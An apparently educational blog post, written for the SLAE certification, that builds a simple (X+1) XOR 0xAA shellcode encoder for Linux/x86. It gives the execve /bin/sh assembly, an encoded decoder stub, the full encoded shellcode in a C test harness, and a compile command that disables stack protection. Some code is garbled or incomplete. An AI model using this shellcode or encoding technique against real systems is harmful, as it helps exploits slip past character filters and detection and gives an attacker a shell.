Custom Shellcode Encoder – X+1 XOR 0xAA (Linux/x86)

Encoders are quite useful in cases where there are restricted characters in an application being exploited. Popular encoders can be found in Metasploit like shikata_ga_nai and many more. To demonstrate how encoders work, I’ve created a very basic encoder which adds 1 byte to each shellcode characters and the result gets XOR’d with 0xAA. The formula goes something like this:

(X + 1) xor 0xAA = Y, where X is a byte of the shellcode and Y is the encoded byte

Y in this case can be transformed back to X using the formula:

(Y xor 0xAA) – 1 = X, where Y is the encoded byte and X is the original shellcode byte

To do this, suppose we have an execve NASM program that runs /bin/sh:

global _start
global _start
section .text

xor eax, eax
push eax
push eax
push eax

push “//sh”
push “/bin”

mov dword[esp + 12], esp
mov ebx, esp
lea ecx, [esp + 12]
mov edx, dword[esp + 16]

mov al, 0x0b
int 0x80

Its shellcode equivalent follows as (Extracted through objdump’s magic):


To encode this, I had to automate through a Python script:

What happens here is that all the original shellcode bytes are encoded using the formula “(X+1) xor 0xAA”. The encoded bytes are then placed with a “push” instruction so that the Python script could output the encoded bytes formatted directly for decoding. The output of this script should be:

global _start
section .text

xor ecx, ecx
xor ebx, ebx
imul ecx

push 0x2B64A61B
push 0xBB8FFF26
push 0xA78FE724
push 0x4E20A78F
push 0xCF20C5C0
push 0xC99AC3C3
push 0xDE9A9AC3
push 0xFBFBFB6B
push 0x983B3B3B
mov cl, 36


mov al, byte[esp + ebx]
xor al, 0xaa
dec al
mov byte[esp + ebx], al
inc ebx
loop again
jmp esp

Once this NASM code is compiled, objdump can be used to present the shellcode using a script found here:

objdump -d ./decoder|grep ‘[0-9a-f]:’|grep -v ‘file’|cut -f2 -d:|cut -f1-6 -d’ ‘|tr -s ‘ ‘|tr ‘\t’ ‘ ‘|sed ‘s/ $//g’|sed ‘s/ /\\x/g’|paste -d ” -s |sed ‘s/^/”/’|sed ‘s/$/”/g’

The final output having the encoded execve /bin/sh shellcode together with the decoder should be something like this:


To test, use the shellcode in a C program:

#include <unistd.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
int main()

char code[] = “\x31\xc9\x31\xdb\xf7\xe9\x68\x1b\xa6\x64\x2b\x68\x26\xff\x8f\xbb\x68\x24\xe7\x8f\xa7\x68\x8f\xa7\x20\x4e\x68\xc0\xc5\x20\xcf\x68\xc3\xc3\x9a\xc9\x68\xc3\x9a\x9a\xde\x68\x6b\xfb\xfb\xfb\x68\x3b\x3b\x3b\x98\xb1\x24\x8a\x04\x1c\x34\xaa\xfe\xc8\x88\x04\x1c\x43\xe2\xf3\xff\xe4”;
printf(“Shellcode Length: %d\n”, strlen(code));
int (*ret)() = (int(*)())code;


Compile the C program:

gcc -fno-stack-protector -z execstack encoded-execve-stack.c -o encoded-execve-stack

Running the program should get us an executed /bin/sh:

While this implementation works well, it should be noted that there are limitations. For example, if the shellcode contains the character “\xA9”, the encoded output will be a null character “\x00” because “\xA9” + 0x01 = “\xAA” and remember the XOR truth table describes that if we do Z xor Z, we get 0 as the result.

All code presented can be found in GitHub.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert Certification (Student ID: SLAE-1261)

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